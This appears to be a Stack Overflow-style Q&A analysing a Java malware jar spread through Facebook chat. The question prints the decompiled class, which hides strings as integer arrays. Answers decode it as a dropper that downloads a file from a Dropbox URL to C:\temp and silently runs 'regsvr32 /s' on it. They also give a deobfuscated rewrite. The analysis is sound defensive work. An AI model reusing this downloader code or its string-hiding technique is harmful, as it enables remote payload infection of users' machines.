# Code inside this undetectable malware

Tags: java, malware, virus

I have got this message two times in facebook quoting " lol abc.rar" , the abc.rar file has an executable jar file which once clicked tries to connect to facebook and enters the same message to another chat randomly. I decompiled it using jd gui 0.36 and found a class czjffdqozxffyhrq inside this malware/virus,there is also a manifest file inside it.I tried virus total but it gives no results. This is surely a threat as it  has come to me from two facebook friends of mine, who are unrelated to each other ,so it's spreading very fast 
virus total result:
https://www.virustotal.com/en/file/a5ce78b2b3e3d6a98982ec300ff05abc8b56a5ed27b9b67b2e2fc417fc56a9df/analysis/1397065080/

Now the code of class:-package com.cakes;

```
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.URL;

public class czjffdqozxffyhrq
{
  public static String mrdbdgwortilmglt()
  {
    int[] tdclrmdqriktvlkvmy = { 104, 116, 116, 112, 58, 47, 47, 100, 108, 46, 100, 114, 111, 112, 98, 111, 120, 117, 115, 101, 114, 99, 111, 110, 116, 101, 110, 116, 46, 99, 111, 109, 47, 115, 47, 110, 108, 100, 113, 99, 116, 110, 98, 118, 108, 101, 122, 52, 50, 98, 47, 109, 111, 100, 117, 108, 101, 46, 100, 97, 116, 63, 100, 108, 61, 49 };

    StringBuilder cfmbxqxdanzahnu = new StringBuilder(tdclrmdqriktvlkvmy.length);
    for (int i = 0; i < tdclrmdqriktvlkvmy.length; i++) {
      cfmbxqxdanzahnu.append((char)tdclrmdqriktvlkvmy[i]);
    }
    return cfmbxqxdanzahnu.toString();
  }

  public static String olzezeaokmr()
  {
    int[] wwlytwss = { 67, 58, 92, 92, 116, 101, 109, 112, 92, 92, 113, 118, 115, 102, 99, 99, 106, 109, 46, 103, 116, 106 };

    StringBuilder uurwhymtb = new StringBuilder(wwlytwss.length);
    for (int i = 0; i < wwlytwss.length; i++) {
      uurwhymtb.append((char)wwlytwss[i]);
    }
    return uurwhymtb.toString();
  }

  public static String wxujpwlzjfvvc()
  {
    int[] krihniioygdowfq = { 67, 58, 92, 92, 116, 101, 109, 112, 92, 92 };

    StringBuilder dmpxcpok = new StringBuilder(krihniioygdowfq.length);
    for (int i = 0; i < krihniioygdowfq.length; i++) {
      dmpxcpok.append((char)krihniioygdowfq[i]);
    }
    return dmpxcpok.toString();
  }

  public static String uwqeeyesndtlyfye()
  {
    int[] wwlytwsspath = { 114, 101, 103, 115, 118, 114, 51, 50, 32, 47, 115, 32, 67, 58, 92, 92, 116, 101, 109, 112, 92, 92, 113, 118, 115, 102, 99, 99, 106, 109, 46, 103, 116, 106 };

    StringBuilder eiljiba = new StringBuilder(wwlytwsspath.length);
    for (int i = 0; i < wwlytwsspath.length; i++) {
      eiljiba.append((char)wwlytwsspath[i]);
    }
    return eiljiba.toString();
  }

  public static void bnyikewbdrqhetgb()
    throws IOException
  {
    int m = 1;
    while (m < 7)
    {
      Runtime.getRuntime().exec(uwqeeyesndtlyfye());
      m++;
    }
  }

  public static void main(String[] args)
    throws Exception
  {
    new File(wxujpwlzjfvvc()).mkdir();
    File u = new File(olzezeaokmr());
    if (u.exists())
    {
      bnyikewbdrqhetgb();
    }
    else
    {
      String pdisodea = mrdbdgwortilmglt();
      String lwpztudm = olzezeaokmr();
      lslmzhpvu(pdisodea, lwpztudm);
    }
  }

  public static void lslmzhpvu(String rklnt, String nenyy)
    throws IOException
  {
    URL hsnmxltpgt = new URL(rklnt);
    InputStream mlzfltpyqeoqdahzvel = hsnmxltpgt.openStream();
    OutputStream uxvkcl = new FileOutputStream(nenyy);
    byte[] b = new byte[432101];
    int length;
    while ((length = mlzfltpyqeoqdahzvel.read(b)) != -1)
    {
      int length;
      uxvkcl.write(b, 0, length);
    }
    mlzfltpyqeoqdahzvel.close();
    uxvkcl.close();
    bnyikewbdrqhetgb();
  }
}
```

Can someone please explain how this is working and why is it still not detectable?

Comment: What do you mean by `not detectable`?

Comment: not detectable by any antivirus.

Comment: Obfuscated code like this makes my eyes bleed.  Code with reasonable names attached to variables and methods is hard enough to read as-is!  What analysis have you already done on this to indicate what it does?  Save us some time and tell us everything you know about "how this is working".

Comment: the code seems to execute some commands via `Runtime.getRuntime().exec(..` and those commands are obfuscated as int arrays

Comment: After I click on this jar file ,a process randomly starts in between while I am working on my computer and tries to communicate with facebook ,at that time my antivirus stops the process,but on running a full virus scan on abc.rar ,it detects nothing !!

Answer (score 3, accepted):

Basically it downloads a file from;

```
http://dl.dropboxusercontent.com/s/nldqctnbvlez42b/******.dat?dl=1
```

(obfuscated link, don't want anyone downloading it by mistake)

...to c:\temp and registers it in the system using;

```
regsvr32 /s <filename>
```

The real evil is probably in the downloaded file (which I'm not going to download :) )

Comment: but how did you find it?

Comment: well, each int in the arrays represents a char. @swapedoc

Comment: @swapedoc `tdclrmdqriktvlkvmy` contains the ascii codes for the characters in `http://dl.dropboxusercontent...` and `wwlytwsspath` contains the ascii codes for the `regsvr32` command. The other two are just paths where the file is stored. There really is no obfuscation to speak of, it's just stored in ascii integers.

Answer (score 3):

This is a pretty trivial attempt at obfuscation.

The methods:

- `mrdbdgwortilmglt`
- `olzezeaokmr`
- `wxujpwlzjfvvc`
- `uwqeeyesndtlyfye`

are just `String`s hidden as arrays of ints.

`bnyikewbdrqhetgb` is clearly naughty, since it's calling `Runtime.getRuntime().exec`... that should always be a warning sign in code.

`lslmzhpvu` is accessing a URL... also naughty.

By "naughty", here, I mean it's code that reaching outside of itself and so, potentially, doing harm elsewhere. In code that you've downloaded, that should be a major warning sign, unless you know that the code should be doing stuff with URLs or executing external programs.

### Why doesn't an antivirus package catch it?

It is catching it. It detects the unauthorized attempt to access a URL and warns you.

### Deobfuscated (a little

```
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.URL;

public class czjffdqozxffyhrq
{
  public static String getDropBoxURL() {
    // This URL has been bowdlerized to protect the dangerously curious
    return "http://dl.dropboxusercontent.com/s/nldqctnbvlez42b/****.dat?dl=1";
  }

  public static String getTempFile() {
    return "C:\\temp\\qvsfccjm.gtj";
  }

  public static String getTempDir() {
    return "C:\\temp\\";
  }

  public static String getRegisterCommand() {
    return "regsvr32 /s C:\\temp\\qvsfccjm.gtj";
  }

  public static void registerControlSixTimes() throws IOException {
    int m = 1;
    while (m < 7)
    {
      Runtime.getRuntime().exec(getRegisterCommand());
      m++;
    }
  }

  public static void main(String[] args) throws Exception {
    new File(getTempDir()).mkdir();
    File u = new File(getTempFile());
    if (u.exists())
    {
      registerControlSixTimes();
    }
    else
    {
      String dbURL = getDropBoxURL();
      String tempFileName = getTempFile();
      downloadFromURLToFile(dbURL, tempFileName);
    }
  }

  public static void downloadFromURLToFile(String urlString, String fileName) throws IOException {
    URL url = new URL(urlString);
    InputStream in = url.openStream();
    OutputStream out = new FileOutputStream(fileName);
    byte[] b = new byte[432101];
    int length;
    while ((length = in.read(b)) != -1) {
      int length;
      out.write(b, 0, length);
    }
    in.close();
    out.close();
    registerControlSixTimes();
  }
}
```